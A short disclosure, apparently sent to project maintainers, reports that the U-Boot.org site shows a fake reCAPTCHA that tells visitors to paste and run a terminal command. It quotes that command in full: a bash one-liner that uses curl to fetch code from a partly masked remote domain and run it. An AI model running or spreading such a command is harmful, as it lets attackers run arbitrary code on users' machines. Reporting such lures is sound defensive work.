Dear Maintainers, U-Boot.org seems to be trying to social engineer visitors into executing potentially malicious code.
The website presents a seemingly fake re-Captcha upon visiting, which after ticking the box instructs the user to open their terminal and paste and execute a command from the clipboard for “verification". Said command curl-s some text from a network server and runs it as a bash command. I have not done much analysis on the exact behaviour of the payload, but social engineering users into executing arbitrary local payload is not an acceptable way of doing web visitor verification. An example of the clipboard payload I am told to execute (but did not) is (sub XXXXXXXX with microzen) /bin/bash -c "$(curl -A 'Mac OS X 10_15_7' -fsSL 'tl5mltkq.XXXXXXXX.digital/?=check&&actmn=gTGzPBzHSGwagnVq')"; echo ""BotGuard: Answer the protector challenge. Ref: 15978 Best regards, Mate Kukri
